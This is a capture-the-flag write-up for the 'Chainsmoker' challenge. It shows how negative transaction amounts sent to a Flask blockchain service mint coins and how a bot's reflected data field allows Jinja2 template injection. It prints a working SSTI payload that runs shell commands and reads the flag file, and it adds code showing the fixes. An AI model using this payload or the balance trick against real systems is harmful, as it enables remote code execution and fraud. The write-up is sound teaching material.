Chainsmoker
We are given a Python script called cli.py that is intended to interact with the remote instance. We also have some Python source code related to the blockchain, which is probably what the server is running.
Another file is bot_wallet.txt, which contains the bot's wallet address (in this challenge an address is a Base64-encoded PEM public key):
LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlHZk1BMEdDU3FHU0liM0RRRUJBUVVBQTRHTkFEQ0JpUUtCZ1FDZzN5RXgxckpaSTlaL1FYUDhkbFVDTnhwKwovSmtzYU5qY3dvbXcydmQwSFZBWEcyRmtPbm82V3VsaGZhRHNseVFYV2JjRjFQcmZoUGFPSlROMTBkQ3lSa0JrCnJ1TlA4NnRMYUFQVnYvWnJObVpxSzhxSGZBRThvaG9tbWFnRkQ2NDlpVG5lNUdyV211TWJ1N3NiYmNXcWl6RnkKVjZKOGRZRU9JQUpUTU9Ra3V3SURBUUFCCi0tLS0tRU5EIFBVQkxJQyBLRVktLS0tLQ==
Finally, there is a README.txt file that says:
The flag is located at /app/flag.txt
Reconnaissance
The remote server is probably running a Flask application: the 404 reason phrase is in capital letters ("NOT FOUND"), and the Server header reports Werkzeug, the WSGI toolkit underneath Flask:
$ curl -i 178.128.173.79:31884
HTTP/1.1 404 NOT FOUND
Server: Werkzeug/2.1.2 Python/3.8.10
Date:
Content-Type: text/html; charset=utf-8
Content-Length: 207
Connection: close
<!doctype html>
<html lang=en>
<title>404 Not Found</title>
<h1>Not Found</h1>
<p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
There is no reference to the flag in the given source files, so we will most likely have to compromise the server itself. Keep in mind that the objective is to compromise the Flask application.
CLI setup
The CLI (cli.py) starts with a local server URL, which we must point at the remote instance:
wallet = None
SERVICE_URL = "http://127.0.0.1:5000"
So let's change it to "http://178.128.173.79:31884".
The CLI offers the following options:
options = {
"help": help,
"wallet show": wallet_show,
"wallet generate": wallet_generate,
"wallet load": wallet_load,
"wallet save": wallet_save,
"transaction": transaction,
"mine": mine,
"pending transactions": pending_transactions,
"balance": balance,
"nodes": nodes,
"blocks": blocks,
"transactions": transactions
}
if __name__ == "__main__":
help()
while True:
i = input("Blockchain> ")
if i in options:
options[i]()
CLI analysis
The only option where we can provide free-form user input is transaction:
def transaction():
global wallet
if wallet is None:
print("[!] Please generate/load a wallet first!")
return -1
recipient = input("Enter Recipient> ")
while True:
amount = input("Amount> ")
if amount.isdigit():
if int(amount) > get_wallet_balance():
print("[+] Cannot send more coin than you have!")
else:
break
else:
print("[+] NaN")
data = input("Enter Data> ")
tx = Transaction(wallet.address, recipient, int(amount))
tx.data = data
tx.sig = hex(wallet.sign_message(str(tx)))[2:]
#required = ['sender', 'recipient', 'amount', 'signature']
r = requests.post(f"{SERVICE_URL}/transactions/new", json={"sender": wallet.address, "recipient":
recipient, "amount": int(amount), "signature": tx.sig, "data": data})
print(f"[+] Sent Transaction: {r.json()['message']}")
Basically, it performs a POST request to /transactions/new with the sender and recipient wallet addresses (when using the CLI, a blank recipient means our own wallet), the amount of coins to send and an arbitrary data field.
Fuzzing the server
The CLI checks that the amount is a number and that we have enough coins, but these checks run only on the client side. We can comment them out and send junk values, hoping the server does not validate them properly. This is the modified code (new_cli.py):
def transaction():
global wallet
if wallet is None:
print("[!] Please generate/load a wallet first!")
return -1
recipient = input("Enter Recipient> ")
# while True:
amount = input("Amount> ")
# if amount.isdigit():
# if int(amount) > get_wallet_balance():
# print("[+] Cannot send more coin than you have!")
# else:
# break
# else:
# print("[+] NaN")
data = input("Enter Data> ")
tx = Transaction(wallet.address, recipient, int(amount))
tx.data = data
tx.sig = hex(wallet.sign_message(str(tx)))[2:]
#required = ['sender', 'recipient', 'amount', 'signature']
r = requests.post(f"{SERVICE_URL}/transactions/new", json={"sender": wallet.address, "recipient":
recipient, "amount": int(amount), "signature": tx.sig, "data": data})
print(f"[+] Sent Transaction: {r.json()['message']}")
Before doing this, we need a wallet (wallet generate and wallet show). Then we run transaction. For example, we can try a negative amount:
$ python3 new_cli.py
Options:
help | wallet show | wallet generate | wallet load | wallet save | transaction | mine | pending transactions | balance | nodes | blocks | transactions
Blockchain> wallet generate
[+] WARNING: KEYS NOT SAVED TO DISK
Blockchain> wallet show
[+] Address: LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlHZk1BMEdDU3FHU0liM0RRRUJBUVVBQTRHTkFEQ0JpUUtCZ1FDeUs1OWF1SzVjZVpWUmc2MzZQbEU5REcrMQpmSE96SmI5TjhHWlFBNnQ2TzJrMUEzaU02ZXhwcmpVSElKWnFZaTQ0T1VUQm5xMXFtQlBPQmdtU0lHWEwyRTdXCnFPOTJDV1JFOThsNTRpQUhNM2NKaUVkemxucWRwdnZVUHhyd2FvRXhyQ3BlU3g1c2VNa0dpc1JwMVBvdWk3REEKcjd6Y0NZdERIWnUyK2ZpZFRRSURBUUFCCi0tLS0tRU5EIFBVQkxJQyBLRVktLS0tLQ==
[+] Balance: 0
Blockchain> wallet save
Enter Wallet File Name> wallet.txt
Blockchain> transaction
Enter Recipient>
Amount> -1337
Enter Data> Testing
[+] Sent Transaction: Transaction will be added to Block 3
We need to mine the block with mine for the transaction to take effect. Afterwards our balance is 1338, so the server does not validate the amount:
Blockchain> mine
[+] Mining!
[+] Done! - New Block Forged (3)
Blockchain> wallet show
[+] Address: LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlHZk1BMEdDU3FHU0liM0RRRUJBUVVBQTRHTkFEQ0JpUUtCZ1FDeUs1OWF1SzVjZVpWUmc2MzZQbEU5REcrMQpmSE96SmI5TjhHWlFBNnQ2TzJrMUEzaU02ZXhwcmpVSElKWnFZaTQ0T1VUQm5xMXFtQlBPQmdtU0lHWEwyRTdXCnFPOTJDV1JFOThsNTRpQUhNM2NKaUVkemxucWRwdnZVUHhyd2FvRXhyQ3BlU3g1c2VNa0dpc1JwMVBvdWk3REEKcjd6Y0NZdERIWnUyK2ZpZFRRSURBUUFCCi0tLS0tRU5EIFBVQkxJQyBLRVktLS0tLQ==
[+] Balance: 1338
What has happened? We told the server to send -1337 coins from us to us, so our balance is "reduced" to 0 - (-1337) = 1337. Mining a block also pays one coin as a reward, so we end up with 1338 coins.
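The root cause is a server that trusts the sign of a client-supplied amount. The following is an added example, not the challenge's server code: a minimal ledger that reproduces the balance arithmetic observed above (the -1337 self-transfer plus one mining reward giving 1338), next to a hardened variant that rejects non-positive and non-integer amounts and also counts pending debits, so the same balance cannot be promised twice before a block is mined. The if/elif order in balance() (debit the sender first) is an assumption chosen to match the writeup's arithmetic; signature verification is left out as it is not the point here.

```python
from dataclasses import dataclass

# Constructed example, not the challenge's server code.
MINING_SENDER = "0"   # the challenge credits mining rewards from sender "0"
MINING_REWARD = 1


@dataclass
class Transaction:
    sender: str
    recipient: str
    amount: int
    data: str = ""


class Ledger:
    def __init__(self, validate_amounts: bool) -> None:
        self.validate_amounts = validate_amounts
        self.chain = []     # list of mined blocks, each a list of transactions
        self.pending = []   # transactions accepted but not yet mined

    def balance(self, address: str) -> int:
        # Assumption: the sender is debited first, otherwise the recipient is
        # credited. A self-transfer of -1337 therefore nets +1337.
        total = 0
        for block in self.chain:
            for tx in block:
                if tx.sender == address:
                    total -= tx.amount
                elif tx.recipient == address:
                    total += tx.amount
        return total

    def pending_debits(self, address: str) -> int:
        # Coins already promised in unmined transactions.
        return sum(tx.amount for tx in self.pending if tx.sender == address)

    def new_transaction(self, tx: Transaction) -> bool:
        if self.validate_amounts:
            # Reject bools (JSON `true` is an int in Python), non-integers,
            # zero and negatives: the missing sign check is the challenge bug.
            if isinstance(tx.amount, bool) or not isinstance(tx.amount, int) or tx.amount <= 0:
                return False
            # Only the mining pseudo-sender may create coins; everyone else must
            # cover the amount with confirmed balance minus pending debits.
            if tx.sender != MINING_SENDER:
                available = self.balance(tx.sender) - self.pending_debits(tx.sender)
                if available < tx.amount:
                    return False
        self.pending.append(tx)
        return True

    def mine(self, miner: str) -> int:
        # Forge a block from the pending transactions plus the miner's reward.
        reward = Transaction(MINING_SENDER, miner, MINING_REWARD)
        self.chain.append(self.pending + [reward])
        self.pending = []
        return len(self.chain)


def replay_writeup() -> int:
    """Replays the -1337 self-transfer and one mined block on the unvalidated ledger."""
    ledger = Ledger(validate_amounts=False)
    ledger.new_transaction(Transaction("me", "me", -1337, "Testing"))
    ledger.mine("me")
    return ledger.balance("me")   # 1338, matching the balance seen in the writeup


if __name__ == "__main__":
    print("unvalidated ledger balance:", replay_writeup())
    hardened = Ledger(validate_amounts=True)
    print("negative amount accepted?", hardened.new_transaction(Transaction("me", "me", -1337)))
```

Whatever the server's exact balance formula, the lesson is the same: every numeric field coming over the wire needs a type check and a range check on the server, and the available balance has to account for transactions that are accepted but not yet confirmed.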
Interacting with the bot
Now that we have coins, we can try to send the bot one. Let's also capture the requests and responses from /mine with Burp Suite by adding a proxies argument to the mine function:
def mine():
global wallet
if wallet is None:
print("[!] Please generate/load a wallet first!")
return -1
print("[+] Mining!")
r_last_block = requests.get(f"{SERVICE_URL}/last_block").json()
last_block = Block.from_json(r_last_block)
last_proof = last_block.proof
last_hash = last_block.hash()
proof = 0
while valid_proof(last_proof, proof, last_hash) is False:
proof += 1
tx = Transaction("0", wallet.address, 1)
sig = hex(wallet.sign_message(str(tx)))[2:]
#required = ['recipient', "signature", "proof"]
r = requests.post(
f"{SERVICE_URL}/mine",
json={
"recipient": wallet.address,
"signature": sig,
"proof": proof
}, proxies={
'http': '127.0.0.1:8080'
})
j = r.json()
if r.status_code == 200:
print(f"[+] Done! - {j['message']} ({j['index']})")
else:
print(f"[!] Done - {j['message']}")
We can load the wallet from a file and keep the same balance. Let’s do the transaction and mine it:
$ python3 new_cli.py
Options:
help | wallet show | wallet generate | wallet load | wallet save | transaction | mine | pending transactions | balance | nodes | blocks | transactions
Blockchain> wallet load
Enter Wallet File Name (q to quit)> wallet.txt
Blockchain> wallet show
[+] Address: LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlHZk1BMEdDU3FHU0liM0RRRUJBUVVBQTRHTkFEQ0JpUUtCZ1FEcnJzbjkzTWxoSE1qTVNHWTc5bjhuVWozUwpSQm82SmYwMVpOSTExaGREejFWY2xlSGIrZ0xIVEFmZXM2TFFGeWpEa1VLdWlHZDRYblprOVRWd1pMUDM5NjQ1ClRFVHhETENFbDJEWE9rQWZhMFZWSGd4MTh3NnVEZm42ZGcvRXgxSnBmYW5WNkRTTGF2dnFWamYvUW8ydmRiK2YKTE9IQ2E0SkwrNng3SHVsRlNRSURBUUFCCi0tLS0tRU5EIFBVQkxJQyBLRVktLS0tLQ==
[+] Balance: 1338
Blockchain> transaction
Enter Recipient> LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlHZk1BMEdDU3FHU0liM0RRRUJBUVVBQTRHTkFEQ0JpUUtCZ1FDZzN5RXgxckpaSTlaL1FYUDhkbFVDTnhwKwovSmtzYU5qY3dvbXcydmQwSFZBWEcyRmtPbm82V3VsaGZhRHNseVFYV2JjRjFQcmZoUGFPSlROMTBkQ3lSa0JrCnJ1TlA4NnRMYUFQVnYvWnJObVpxSzhxSGZBRThvaG9tbWFnRkQ2NDlpVG5lNUdyV211TWJ1N3NiYmNXcWl6RnkKVjZKOGRZRU9JQUpUTU9Ra3V3SURBUUFCCi0tLS0tRU5EIFBVQkxJQyBLRVktLS0tLQ==
Amount> 1
Enter Data> One coin
[+] Sent Transaction: Transaction will be added to Block 4
Blockchain> mine
[+] Mining!
Burp Suite now shows the /mine request and the server's response (screenshots omitted). If we forward the request, we still have the same balance:
[+] Done! - New Block Forged (4)
Blockchain> wallet show
[+] Address: LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlHZk1BMEdDU3FHU0liM0RRRUJBUVVBQTRHTkFEQ0JpUUtCZ1FEcnJzbjkzTWxoSE1qTVNHWTc5bjhuVWozUwpSQm82SmYwMVpOSTExaGREejFWY2xlSGIrZ0xIVEFmZXM2TFFGeWpEa1VLdWlHZDRYblprOVRWd1pMUDM5NjQ1ClRFVHhETENFbDJEWE9rQWZhMFZWSGd4MTh3NnVEZm42ZGcvRXgxSnBmYW5WNkRTTGF2dnFWamYvUW8ydmRiK2YKTE9IQ2E0SkwrNng3SHVsRlNRSURBUUFCCi0tLS0tRU5EIFBVQkxJQyBLRVktLS0tLQ==
[+] Balance: 1338
If the bot replies with another transaction, we should mine the new block:
Blockchain> mine
[+] Mining!
And we get another HTTP response in Burp Suite (screenshot omitted). Now we have two more coins: one sent back by the bot and one mining reward. We can also view the received data using transactions and specifying the block index:
[+] Done! - New Block Forged (5)
Blockchain> wallet show
[+] Address: LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlHZk1BMEdDU3FHU0liM0RRRUJBUVVBQTRHTkFEQ0JpUUtCZ1FEcnJzbjkzTWxoSE1qTVNHWTc5bjhuVWozUwpSQm82SmYwMVpOSTExaGREejFWY2xlSGIrZ0xIVEFmZXM2TFFGeWpEa1VLdWlHZDRYblprOVRWd1pMUDM5NjQ1ClRFVHhETENFbDJEWE9rQWZhMFZWSGd4MTh3NnVEZm42ZGcvRXgxSnBmYW5WNkRTTGF2dnFWamYvUW8ydmRiK2YKTE9IQ2E0SkwrNng3SHVsRlNRSURBUUFCCi0tLS0tRU5EIFBVQkxJQyBLRVktLS0tLQ==
[+] Balance: 1340
Blockchain> transactions
Enter Block Index> 5
------------------------------
From: LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlHZk1BMEdDU3FHU0liM0RRRUJBUVVBQTRHTkFEQ0JpUUtCZ1FDZzN5RXgxckpaSTlaL1FYUDhkbFVDTnhwKwovSmtzYU5qY3dvbXcydmQwSFZBWEcyRmtPbm82V3VsaGZhRHNseVFYV2JjRjFQcmZoUGFPSlROMTBkQ3lSa0JrCnJ1TlA4NnRMYUFQVnYvWnJObVpxSzhxSGZBRThvaG9tbWFnRkQ2NDlpVG5lNUdyV211TWJ1N3NiYmNXcWl6RnkKVjZKOGRZRU9JQUpUTU9Ra3V3SURBUUFCCi0tLS0tRU5EIFBVQkxJQyBLRVktLS0tLQ==
To: LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlHZk1BMEdDU3FHU0liM0RRRUJBUVVBQTRHTkFEQ0JpUUtCZ1FEcnJzbjkzTWxoSE1qTVNHWTc5bjhuVWozUwpSQm82SmYwMVpOSTExaGREejFWY2xlSGIrZ0xIVEFmZXM2TFFGeWpEa1VLdWlHZDRYblprOVRWd1pMUDM5NjQ1ClRFVHhETENFbDJEWE9rQWZhMFZWSGd4MTh3NnVEZm42ZGcvRXgxSnBmYW5WNkRTTGF2dnFWamYvUW8ydmRiK2YKTE9IQ2E0SkwrNng3SHVsRlNRSURBUUFCCi0tLS0tRU5EIFBVQkxJQyBLRVktLS0tLQ==
Amount: 1
Data: Minimum Amount not met! (>= 1,000,000)
------------------------------
From: 0
To: LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlHZk1BMEdDU3FHU0liM0RRRUJBUVVBQTRHTkFEQ0JpUUtCZ1FEcnJzbjkzTWxoSE1qTVNHWTc5bjhuVWozUwpSQm82SmYwMVpOSTExaGREejFWY2xlSGIrZ0xIVEFmZXM2TFFGeWpEa1VLdWlHZDRYblprOVRWd1pMUDM5NjQ1ClRFVHhETENFbDJEWE9rQWZhMFZWSGd4MTh3NnVEZm42ZGcvRXgxSnBmYW5WNkRTTGF2dnFWamYvUW8ydmRiK2YKTE9IQ2E0SkwrNng3SHVsRlNRSURBUUFCCi0tLS0tRU5EIFBVQkxJQyBLRVktLS0tLQ==
Amount: 1
Data:
------------------------------
We guess that we need to send at least one million coins to trigger something.
Becoming a millionaire
So let's do another transaction with a negative amount so that we have enough coins:
Blockchain> transaction
Enter Recipient>
Amount> -100000000
Enter Data> Millionaire
[+] Sent Transaction: Transaction will be added to Block 6
Blockchain> mine
[+] Mining!
[+] Done! - New Block Forged (6)
Blockchain> wallet show
[+] Address: LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlHZk1BMEdDU3FHU0liM0RRRUJBUVVBQTRHTkFEQ0JpUUtCZ1FEcnJzbjkzTWxoSE1qTVNHWTc5bjhuVWozUwpSQm82SmYwMVpOSTExaGREejFWY2xlSGIrZ0xIVEFmZXM2TFFGeWpEa1VLdWlHZDRYblprOVRWd1pMUDM5NjQ1ClRFVHhETENFbDJEWE9rQWZhMFZWSGd4MTh3NnVEZm42ZGcvRXgxSnBmYW5WNkRTTGF2dnFWamYvUW8ydmRiK2YKTE9IQ2E0SkwrNng3SHVsRlNRSURBUUFCCi0tLS0tRU5EIFBVQkxJQyBLRVktLS0tLQ==
[+] Balance: 100001341
Alright, now we need to make a transaction of more than one million coins to pass the limit:
Blockchain> transaction
Enter Recipient> LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlHZk1BMEdDU3FHU0liM0RRRUJBUVVBQTRHTkFEQ0JpUUtCZ1FDZzN5RXgxckpaSTlaL1FYUDhkbFVDTnhwKwovSmtzYU5qY3dvbXcydmQwSFZBWEcyRmtPbm82V3VsaGZhRHNseVFYV2JjRjFQcmZoUGFPSlROMTBkQ3lSa0JrCnJ1TlA4NnRMYUFQVnYvWnJObVpxSzhxSGZBRThvaG9tbWFnRkQ2NDlpVG5lNUdyV211TWJ1N3NiYmNXcWl6RnkKVjZKOGRZRU9JQUpUTU9Ra3V3SURBUUFCCi0tLS0tRU5EIFBVQkxJQyBLRVktLS0tLQ==
Amount> 1000001
Enter Data> Hi bot
[+] Sent Transaction: Transaction will be added to Block 7
Blockchain> mine
[+] Mining!
[+] Done! - New Block Forged (7)
Blockchain> mine
[+] Mining!
[+] Done! - New Block Forged (8)
After mining our transaction and the bot's reply, we can see in Burp Suite that our input data is reflected in the bot's response (screenshot omitted):
We can visualize it from the CLI too:
Blockchain> transactions
Enter Block Index> 8
------------------------------
From: LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlHZk1BMEdDU3FHU0liM0RRRUJBUVVBQTRHTkFEQ0JpUUtCZ1FDZzN5RXgxckpaSTlaL1FYUDhkbFVDTnhwKwovSmtzYU5qY3dvbXcydmQwSFZBWEcyRmtPbm82V3VsaGZhRHNseVFYV2JjRjFQcmZoUGFPSlROMTBkQ3lSa0JrCnJ1TlA4NnRMYUFQVnYvWnJObVpxSzhxSGZBRThvaG9tbWFnRkQ2NDlpVG5lNUdyV211TWJ1N3NiYmNXcWl6RnkKVjZKOGRZRU9JQUpUTU9Ra3V3SURBUUFCCi0tLS0tRU5EIFBVQkxJQyBLRVktLS0tLQ==
To: LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlHZk1BMEdDU3FHU0liM0RRRUJBUVVBQTRHTkFEQ0JpUUtCZ1FEcnJzbjkzTWxoSE1qTVNHWTc5bjhuVWozUwpSQm82SmYwMVpOSTExaGREejFWY2xlSGIrZ0xIVEFmZXM2TFFGeWpEa1VLdWlHZDRYblprOVRWd1pMUDM5NjQ1ClRFVHhETENFbDJEWE9rQWZhMFZWSGd4MTh3NnVEZm42ZGcvRXgxSnBmYW5WNkRTTGF2dnFWamYvUW8ydmRiK2YKTE9IQ2E0SkwrNng3SHVsRlNRSURBUUFCCi0tLS0tRU5EIFBVQkxJQyBLRVktLS0tLQ==
Amount: 1000001
Data: Hello From LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlHZk1BMEdDU3...!
You said: Hi bot
------------------------------
From: 0
To: LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlHZk1BMEdDU3FHU0liM0RRRUJBUVVBQTRHTkFEQ0JpUUtCZ1FEcnJzbjkzTWxoSE1qTVNHWTc5bjhuVWozUwpSQm82SmYwMVpOSTExaGREejFWY2xlSGIrZ0xIVEFmZXM2TFFGeWpEa1VLdWlHZDRYblprOVRWd1pMUDM5NjQ1ClRFVHhETENFbDJEWE9rQWZhMFZWSGd4MTh3NnVEZm42ZGcvRXgxSnBmYW5WNkRTTGF2dnFWamYvUW8ydmRiK2YKTE9IQ2E0SkwrNng3SHVsRlNRSURBUUFCCi0tLS0tRU5EIFBVQkxJQyBLRVktLS0tLQ==
Amount: 1
Data:
------------------------------
SSTI exploitation
This reflection encourages us to test some payloads for Server-Side Template Injection (SSTI), since Flask renders with Jinja2 and SSTI is a common theme in Flask challenges. For instance, we can send {{7*7}} and check whether we see 49:
Blockchain> transaction
Enter Recipient> LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlHZk1BMEdDU3FHU0liM0RRRUJBUVVBQTRHTkFEQ0JpUUtCZ1FDZzN5RXgxckpaSTlaL1FYUDhkbFVDTnhwKwovSmtzYU5qY3dvbXcydmQwSFZBWEcyRmtPbm82V3VsaGZhRHNseVFYV2JjRjFQcmZoUGFPSlROMTBkQ3lSa0JrCnJ1TlA4NnRMYUFQVnYvWnJObVpxSzhxSGZBRThvaG9tbWFnRkQ2NDlpVG5lNUdyV211TWJ1N3NiYmNXcWl6RnkKVjZKOGRZRU9JQUpUTU9Ra3V3SURBUUFCCi0tLS0tRU5EIFBVQkxJQyBLRVktLS0tLQ==
Amount> 1000001
Enter Data> {{7*7}}
[+] Sent Transaction: Transaction will be added to Block 9
Blockchain> mine
[+] Mining!
[+] Done! - New Block Forged (9)
Blockchain> mine
[+] Mining!
[+] Done! - New Block Forged (10)
And there we have it:
Blockchain> transactions
Enter Block Index> 10
------------------------------
From: LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlHZk1BMEdDU3FHU0liM0RRRUJBUVVBQTRHTkFEQ0JpUUtCZ1FDZzN5RXgxckpaSTlaL1FYUDhkbFVDTnhwKwovSmtzYU5qY3dvbXcydmQwSFZBWEcyRmtPbm82V3VsaGZhRHNseVFYV2JjRjFQcmZoUGFPSlROMTBkQ3lSa0JrCnJ1TlA4NnRMYUFQVnYvWnJObVpxSzhxSGZBRThvaG9tbWFnRkQ2NDlpVG5lNUdyV211TWJ1N3NiYmNXcWl6RnkKVjZKOGRZRU9JQUpUTU9Ra3V3SURBUUFCCi0tLS0tRU5EIFBVQkxJQyBLRVktLS0tLQ==
To: LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlHZk1BMEdDU3FHU0liM0RRRUJBUVVBQTRHTkFEQ0JpUUtCZ1FEcnJzbjkzTWxoSE1qTVNHWTc5bjhuVWozUwpSQm82SmYwMVpOSTExaGREejFWY2xlSGIrZ0xIVEFmZXM2TFFGeWpEa1VLdWlHZDRYblprOVRWd1pMUDM5NjQ1ClRFVHhETENFbDJEWE9rQWZhMFZWSGd4MTh3NnVEZm42ZGcvRXgxSnBmYW5WNkRTTGF2dnFWamYvUW8ydmRiK2YKTE9IQ2E0SkwrNng3SHVsRlNRSURBUUFCCi0tLS0tRU5EIFBVQkxJQyBLRVktLS0tLQ==
Amount: 1000001
Data: Hello From LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlHZk1BMEdDU3...!
You said: 49
------------------------------
From: 0
To: LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlHZk1BMEdDU3FHU0liM0RRRUJBUVVBQTRHTkFEQ0JpUUtCZ1FEcnJzbjkzTWxoSE1qTVNHWTc5bjhuVWozUwpSQm82SmYwMVpOSTExaGREejFWY2xlSGIrZ0xIVEFmZXM2TFFGeWpEa1VLdWlHZDRYblprOVRWd1pMUDM5NjQ1ClRFVHhETENFbDJEWE9rQWZhMFZWSGd4MTh3NnVEZm42ZGcvRXgxSnBmYW5WNkRTTGF2dnFWamYvUW8ydmRiK2YKTE9IQ2E0SkwrNng3SHVsRlNRSURBUUFCCi0tLS0tRU5EIFBVQkxJQyBLRVktLS0tLQ==
Amount: 1
Data:
------------------------------
At this point, we can inject Python code through the template engine to get Remote Code Execution (RCE). In PayloadsAllTheThings we can find the following Jinja2 payload to execute a system command:
{{ cycler.__init__.__globals__.os.popen('id').read() }}
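The {{7*7}} probe and the cycler payload both work for the same reason: the bot puts our data into the template source instead of the render context. The following is an added example, not the challenge's bot code, showing the assumed vulnerable pattern beside the fixed one using Jinja2 directly (the same engine Flask's render_template_string uses), plus a small detector for the transaction log. The reply format ("Hello From <address>...!", "You said: ...") is taken from the bot's output above; the function names are my own.

```python
from jinja2 import Environment

# Constructed example, not the challenge's bot code. Assumption: the bot renders
# its reply with Jinja2 and the user's data is concatenated into the template.
env = Environment()   # autoescape off, like render_template_string on a plain string


def reply_vulnerable(sender: str, data: str) -> str:
    # BUG: `data` becomes part of the template *source*, so any {{ ... }} or
    # {% ... %} the user sends is parsed and evaluated by Jinja2.
    source = f"Hello From {sender[:60]}...!\nYou said: {data}"
    return env.from_string(source).render()


def reply_fixed(sender: str, data: str) -> str:
    # The template source is a constant; user input only arrives through the
    # render context, where Jinja2 treats it as a value and never parses it.
    source = "Hello From {{ sender[:60] }}...!\nYou said: {{ data }}"
    return env.from_string(source).render(sender=sender, data=data)


def looks_like_template_probe(data: str) -> bool:
    # Cheap detection for the transaction log: Jinja2 delimiters inside a
    # free-text field are a strong SSTI indicator worth alerting on.
    return any(marker in data for marker in ("{{", "{%", "{#"))


if __name__ == "__main__":
    addr = "LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0K" * 3   # constructed address-like string
    print(reply_vulnerable(addr, "{{7*7}}"))   # ends with "You said: 49"
    print(reply_fixed(addr, "{{7*7}}"))        # ends with "You said: {{7*7}}"
```

In the vulnerable version the global cycler object is reachable from the template, and its __init__.__globals__ leads to the os module, which is exactly what the payload above exploits. Keeping user data out of the template source is the real fix; jinja2.sandbox.SandboxedEnvironment, which refuses access to underscore-prefixed attributes, is a worthwhile second layer but not a substitute.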
Flag
So let's run cat /app/flag.txt instead of id to get the flag:
Blockchain> transaction
Enter Recipient> LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlHZk1BMEdDU3FHU0liM0RRRUJBUVVBQTRHTkFEQ0JpUUtCZ1FDZzN5RXgxckpaSTlaL1FYUDhkbFVDTnhwKwovSmtzYU5qY3dvbXcydmQwSFZBWEcyRmtPbm82V3VsaGZhRHNseVFYV2JjRjFQcmZoUGFPSlROMTBkQ3lSa0JrCnJ1TlA4NnRMYUFQVnYvWnJObVpxSzhxSGZBRThvaG9tbWFnRkQ2NDlpVG5lNUdyV211TWJ1N3NiYmNXcWl6RnkKVjZKOGRZRU9JQUpUTU9Ra3V3SURBUUFCCi0tLS0tRU5EIFBVQkxJQyBLRVktLS0tLQ==
Amount> 1000001
Enter Data> {{ cycler.__init__.__globals__.os.popen('cat /app/flag.txt').read() }}
[+] Sent Transaction: Transaction will be added to Block 11
Blockchain> mine
[+] Mining!
[+] Done! - New Block Forged (11)
Blockchain> mine
[+] Mining!
[+] Done! - New Block Forged (12)
Blockchain> transactions
Enter Block Index> 12
------------------------------
From: LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlHZk1BMEdDU3FHU0liM0RRRUJBUVVBQTRHTkFEQ0JpUUtCZ1FDZzN5RXgxckpaSTlaL1FYUDhkbFVDTnhwKwovSmtzYU5qY3dvbXcydmQwSFZBWEcyRmtPbm82V3VsaGZhRHNseVFYV2JjRjFQcmZoUGFPSlROMTBkQ3lSa0JrCnJ1TlA4NnRMYUFQVnYvWnJObVpxSzhxSGZBRThvaG9tbWFnRkQ2NDlpVG5lNUdyV211TWJ1N3NiYmNXcWl6RnkKVjZKOGRZRU9JQUpUTU9Ra3V3SURBUUFCCi0tLS0tRU5EIFBVQkxJQyBLRVktLS0tLQ==
To: LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlHZk1BMEdDU3FHU0liM0RRRUJBUVVBQTRHTkFEQ0JpUUtCZ1FEcnJzbjkzTWxoSE1qTVNHWTc5bjhuVWozUwpSQm82SmYwMVpOSTExaGREejFWY2xlSGIrZ0xIVEFmZXM2TFFGeWpEa1VLdWlHZDRYblprOVRWd1pMUDM5NjQ1ClRFVHhETENFbDJEWE9rQWZhMFZWSGd4MTh3NnVEZm42ZGcvRXgxSnBmYW5WNkRTTGF2dnFWamYvUW8ydmRiK2YKTE9IQ2E0SkwrNng3SHVsRlNRSURBUUFCCi0tLS0tRU5EIFBVQkxJQyBLRVktLS0tLQ==
Amount: 1000001
Data: Hello From LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlHZk1BMEdDU3...!
You said: HTB{w34k_Rs4_4nD_T3mPl4t3s___Wh4t_h4s_tH3_w0R1d_c0m3_t0?!?}
------------------------------
From: 0
To: LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlHZk1BMEdDU3FHU0liM0RRRUJBUVVBQTRHTkFEQ0JpUUtCZ1FEcnJzbjkzTWxoSE1qTVNHWTc5bjhuVWozUwpSQm82SmYwMVpOSTExaGREejFWY2xlSGIrZ0xIVEFmZXM2TFFGeWpEa1VLdWlHZDRYblprOVRWd1pMUDM5NjQ1ClRFVHhETENFbDJEWE9rQWZhMFZWSGd4MTh3NnVEZm42ZGcvRXgxSnBmYW5WNkRTTGF2dnFWamYvUW8ydmRiK2YKTE9IQ2E0SkwrNng3SHVsRlNRSURBUUFCCi0tLS0tRU5EIFBVQkxJQyBLRVktLS0tLQ==
Amount: 1
Data:
------------------------------